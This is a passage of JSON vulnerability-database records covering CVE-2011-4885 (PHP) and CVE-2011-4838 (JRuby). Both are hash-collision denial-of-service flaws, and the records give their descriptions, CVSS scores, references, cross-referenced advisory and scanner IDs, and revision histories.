"https://nvd.nist.gov/vuln/detail/CVE-2011-4885", "https://launchpad.net/bugs/cve/CVE-2011-4885", "https://security-tracker.debian.org/tracker/CVE-2011-4885"], "cvelist": ["CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-22T21:55:58", "history": [{"bulletin": {"id": "UB:CVE-2011-4885", "vendorId": null, "hash": "a59e4856287c0173760ad1c3a270a0a1", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4885", "description": "PHP before 5.3.9 computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296>\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4885", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "https://ubuntu.com/security/notices/USN-1358-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4885", "https://launchpad.net/bugs/cve/CVE-2011-4885", "https://security-tracker.debian.org/tracker/CVE-2011-4885"], "cvelist": ["CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-07-01T00:42:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "seebug", "idList": ["SSV:30071", "SSV:30001", "SSV:72454"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-0093.NASL", "CENTOS_RHSA-2012-0092.NASL", "ORACLELINUX_ELSA-2012-0092.NASL", "CENTOS_RHSA-2012-0093.NASL", "PHP_5_3_10.NASL", "REDHAT-RHSA-2012-0093.NASL", "F5_BIGIP_SOL13588.NASL", "ORACLELINUX_ELSA-2012-0019.NASL", "CENTOS_RHSA-2012-0019.NASL", "FEDORA_2012-0504.NASL"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:6D55C20D95", "FEDORA:6097820D6A", "FEDORA:7F79620D03", "FEDORA:7706F20CE7", "FEDORA:3515C213E6", "FEDORA:8CC7E20B55", "FEDORA:A38F421375", "FEDORA:76D5120DE0"]}, {"type": "amazon", "idList": ["ALAS-2012-037", "ALAS-2012-041"]}, {"type": "centos", "idList": ["CESA-2012:0092", "CESA-2012:0093"]}, {"type": "redhat", "idList": ["RHSA-2012:0019", "RHSA-2012:0092", "RHSA-2012:0093"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310864015", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310863712", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310881226", "OPENVAS:881142", "OPENVAS:1361412562310863824", "OPENVAS:1361412562310870529", "OPENVAS:1361412562310863713"]}, {"type": "ubuntu", "idList": ["USN-1358-1"]}], "modified": "2021-07-01T00:42:54", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-01T00:42:54", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.3.9", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "php5"}], "bugs": ["https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296"]}, "lastseen": "2021-07-01T00:42:54", "differentElements": ["cvss2"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2011-4885", "vendorId": null, "hash": "cf5d4bdd14baead47635deb5be24ad7a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4885", "description": "PHP before 5.3.9 computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296>\n", "published": "2011-12-29T00:00:00", "modified": "2011-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4885", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://www.nruns.com/_downloads/advisory28122011.pdf", "https://ubuntu.com/security/notices/USN-1358-1", "https://nvd.nist.gov/vuln/detail/CVE-2011-4885", "https://launchpad.net/bugs/cve/CVE-2011-4885", "https://security-tracker.debian.org/tracker/CVE-2011-4885"], "cvelist": ["CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-07-31T01:36:32", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "nessus", "idList": ["PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-1301.NASL", "CENTOS_RHSA-2012-0019.NASL", "FEDORA_2012-0420.NASL", "ALA_ALAS-2012-37.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0019.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2012-0019.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2012-1262.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "seebug", "idList": ["SSV:30071", "SSV:72454", "SSV:30001"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310863963", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310870539", "OPENVAS:1361412562310863712", "OPENVAS:863815", "OPENVAS:136141256231070759", "OPENVAS:1361412562310870529", "OPENVAS:881149", "OPENVAS:863713", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310863815", "OPENVAS:864015", "OPENVAS:1361412562310863824", "OPENVAS:881095", "OPENVAS:863706", "OPENVAS:136141256231070735", "OPENVAS:863824", "OPENVAS:70735", "OPENVAS:1361412562310863740", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310881142", "OPENVAS:863740", "OPENVAS:881226", "OPENVAS:870539", "OPENVAS:864028", "OPENVAS:1361412562310881095", "OPENVAS:863954", "OPENVAS:863735", "OPENVAS:881119", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310122012", "OPENVAS:870542", "OPENVAS:1361412562310870542", "OPENVAS:1361412562310881226", "OPENVAS:863712", "OPENVAS:831518", "OPENVAS:1361412562310120256", "OPENVAS:881142", "OPENVAS:1361412562310864015", "OPENVAS:881075", "OPENVAS:1361412562310881075", "OPENVAS:1361412562310120220", "OPENVAS:863963", "OPENVAS:870529", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310863713", "OPENVAS:863742", "OPENVAS:1361412562310863742"]}, {"type": "fedora", "idList": ["FEDORA:8CC7E20B55", "FEDORA:3EA60213F3", "FEDORA:8893F20D13", "FEDORA:994FA20B8F", "FEDORA:3515C213E6", "FEDORA:A38F421375", "FEDORA:6097820D6A", "FEDORA:76D5120DE0", "FEDORA:6D55C20D95", "FEDORA:4930D21410", "FEDORA:7706F20CE7", "FEDORA:7F79620D03"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0019", "CESA-2012:0092"]}, {"type": "redhat", "idList": ["RHSA-2012:0093", "RHSA-2012:0019", "RHSA-2012:0092"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-037"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019"]}, {"type": "ubuntu", "idList": ["USN-1358-1"]}], "modified": "2021-07-31T01:36:32", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-31T01:36:32", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.3.9", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "php5"}], "bugs": ["https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296"]}, "lastseen": "2021-07-31T01:36:32", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "nessus", "idList": ["PHP_5_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0019.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2012-1262.NASL", "ALA_ALAS-2012-37.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0019.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:30071", "SSV:30001"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "openvas", "idList": ["OPENVAS:881075", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310863963", "OPENVAS:136141256231070735", "OPENVAS:1361412562310863713", "OPENVAS:864015", "OPENVAS:1361412562310870529", "OPENVAS:863740", "OPENVAS:863713", "OPENVAS:864028", "OPENVAS:881149", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310864015", "OPENVAS:881095", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310863735", "OPENVAS:863742", "OPENVAS:1361412562310881095", "OPENVAS:863954", "OPENVAS:1361412562310870539", "OPENVAS:870529", "OPENVAS:863712", "OPENVAS:881226", "OPENVAS:1361412562310863815", "OPENVAS:1361412562310122012", "OPENVAS:870539", "OPENVAS:1361412562310863712", "OPENVAS:881142", "OPENVAS:1361412562310881075", "OPENVAS:863706", "OPENVAS:870542", "OPENVAS:831518", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310863740", "OPENVAS:70735", "OPENVAS:1361412562310870542", "OPENVAS:863735", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310863824", "OPENVAS:863815", "OPENVAS:863963", "OPENVAS:1361412562310881142", "OPENVAS:881119", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863742", "OPENVAS:863824"]}, {"type": "fedora", "idList": ["FEDORA:6097820D6A", "FEDORA:7706F20CE7", "FEDORA:3EA60213F3", "FEDORA:994FA20B8F", "FEDORA:7F79620D03", "FEDORA:8893F20D13", "FEDORA:4930D21410", "FEDORA:76D5120DE0", "FEDORA:A38F421375", "FEDORA:6D55C20D95", "FEDORA:8CC7E20B55", "FEDORA:3515C213E6"]}, {"type": "redhat", "idList": ["RHSA-2012:0093", "RHSA-2012:0092", "RHSA-2012:0019"]}, {"type": "centos", "idList": ["CESA-2012:0019", "CESA-2012:0092", "CESA-2012:0093"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-037"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12097"]}, {"type": "ubuntu", "idList": ["USN-1358-1"]}], "modified": "2021-11-22T21:55:58", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-11-22T21:55:58", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "5.3.9", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "php5"}], "bugs": ["https://bugs.launchpad.net/ubuntu/+source/php5/+bug/910296"], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "cve": [{"id": "CVE-2011-4838", "bulletinFamily": "NVD", "title": "CVE-2011-4838", "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "published": "2011-12-30T01:55:00", "modified": "2021-01-12T14:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "reporter": "cve@mitre.org", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "cvelist": ["CVE-2011-4838"], "type": "cve", "lastseen": "2021-04-22T23:19:45", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "jruby:jruby", "name": "jruby", "operator": "lt", "version": "1.6.5.1"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.5.1:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.5.1", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4838"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-400"], "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T05:51:09", "references": [{"idList": ["VU:903934"], "type": "cert"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:71568"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["DEBIAN:DLA-209-1:3C908"], "type": "debian"}, {"idList": ["GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL"], "type": "nessus"}, {"idList": ["SSV:26121"], "type": "seebug"}, {"idList": ["GLSA-201207-06"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2021-02-02T05:51:09", "rev": 2, "value": 5.6, "vector": "NONE"}, "twitter": {"counter": 1, "modified": "2020-12-09T19:39:12", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1349005479905779712", "text": " NEW: CVE-2011-4838 JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU c... (click for more) https://t.co/jce7a6Ksup?amp=1"}]}}, "extraReferences": [{"name": "47407", "refsource": "SECUNIA", "tags": ["Third Party Advisory"], "url": "http://secunia.com/advisories/47407"}, {"name": "20111228 n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table", "refsource": "BUGTRAQ", "tags": ["Broken Link"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html"}, {"name": "GLSA-201207-06", "refsource": "GENTOO", "tags": ["Third Party Advisory"], "url": "http://security.gentoo.org/glsa/glsa-201207-06.xml"}, {"name": "VU#903934", "refsource": "CERT-VN", "tags": ["Third Party Advisory", "US Government Resource"], "url": "http://www.kb.cert.org/vuls/id/903934"}, {"name": "http://jruby.org/2011/12/27/jruby-1-6-5-1.html", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"}, {"name": "http://www.ocert.org/advisories/ocert-2011-003.html", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "http://www.ocert.org/advisories/ocert-2011-003.html"}, {"name": "50084", "refsource": "SECUNIA", "tags": ["Third Party Advisory"], "url": "http://secunia.com/advisories/50084"}, {"name": "jruby-hash-dos(72019)", "refsource": "XF", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019"}, {"name": "RHSA-2012:1232", "refsource": "REDHAT", "tags": ["Broken Link"], "url": "http://rhn.redhat.com/errata/RHSA-2012-1232.html"}, {"name": "http://www.nruns.com/_downloads/advisory28122011.pdf", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "http://www.nruns.com/_downloads/advisory28122011.pdf"}], "hash": "92f0f2f8c037700ea5dadad03da7edbbc50f3d6897fa84bb24a161bb8977dbdd", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "b6e256142260bf4cd919296d0ecdb405", "key": "cvss2"}, {"hash": "237c187a60e5866b50769c5eb9af0909", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "73dd98d1abd656f12b1fa8d66914aef8", "key": "extraReferences"}, {"hash": "7dd7925ad368cc8c6fb5df427ff6ba17", "key": "cwe"}, {"hash": "37cda89e37d1920fde85ffc53ccf51b9", "key": "href"}, {"hash": "20da023bb2c9bddaa0becd23dddd45f3", "key": "cvelist"}, {"hash": "fb31ded4b8ceb8898100f3440eb05702", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "875718af4756f164e28a0e0c4f98198d", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "651ac6624ff778a87e68941d1da0917b", "key": "affectedSoftware"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "5c1c2a59f06ce368ba56a83d910aaa0a", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "51ec4a169231853196ced711c9889a34", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "id": "CVE-2011-4838", "immutableFields": [], "lastseen": "2021-02-02T05:51:09", "modified": "2021-01-12T14:30:00", "objectVersion": "1.5", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "reporter": "cve@mitre.org", "title": "CVE-2011-4838", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T05:51:09"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "jruby:jruby", "name": "jruby", "operator": "lt", "version": "1.6.5.1"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.5.1:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.5.1", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4838"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-400"], "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-01-13T13:53:34", "references": [{"idList": ["VU:903934"], "type": "cert"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:71568"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["DEBIAN:DLA-209-1:3C908"], "type": "debian"}, {"idList": ["GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL"], "type": "nessus"}, {"idList": ["SSV:26121"], "type": "seebug"}, {"idList": ["GLSA-201207-06"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2021-01-13T13:53:34", "rev": 2, "value": 5.6, "vector": "NONE"}, "twitter": {"counter": 1, "modified": "2020-12-09T19:39:12", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1349005479905779712", "text": " NEW: CVE-2011-4838 JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU c... (click for more) https://t.co/jce7a6Ksup?amp=1"}]}}, "extraReferences": [], "hash": "1b36305edd549c49c9f91e5ab8b7c7629fd45f4f50eca285268b8e19652305c6", "hashmap": [{"hash": "b6e256142260bf4cd919296d0ecdb405", "key": "cvss2"}, {"hash": "237c187a60e5866b50769c5eb9af0909", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7dd7925ad368cc8c6fb5df427ff6ba17", "key": "cwe"}, {"hash": "37cda89e37d1920fde85ffc53ccf51b9", "key": "href"}, {"hash": "20da023bb2c9bddaa0becd23dddd45f3", "key": "cvelist"}, {"hash": "fb31ded4b8ceb8898100f3440eb05702", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "875718af4756f164e28a0e0c4f98198d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "651ac6624ff778a87e68941d1da0917b", "key": "affectedSoftware"}, {"hash": "41b62a8aa1ee5c40897717cadc30784a", "key": "cvss"}, {"hash": "5c1c2a59f06ce368ba56a83d910aaa0a", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "51ec4a169231853196ced711c9889a34", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "id": "CVE-2011-4838", "lastseen": "2021-01-13T13:53:34", "modified": "2021-01-12T14:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "reporter": "cve@mitre.org", "title": "CVE-2011-4838", "type": "cve", "viewCount": 2}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2021-01-13T13:53:34"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.4"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.6"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "0.9.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "le", "version": "1.6.5"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.2"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.0.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.1.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.5.3"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.2.0"}, {"cpeName": "jruby:jruby", "name": "jruby", "operator": "eq", "version": "1.6.3"}, {"cpeName": "jruby:jruby", "name": 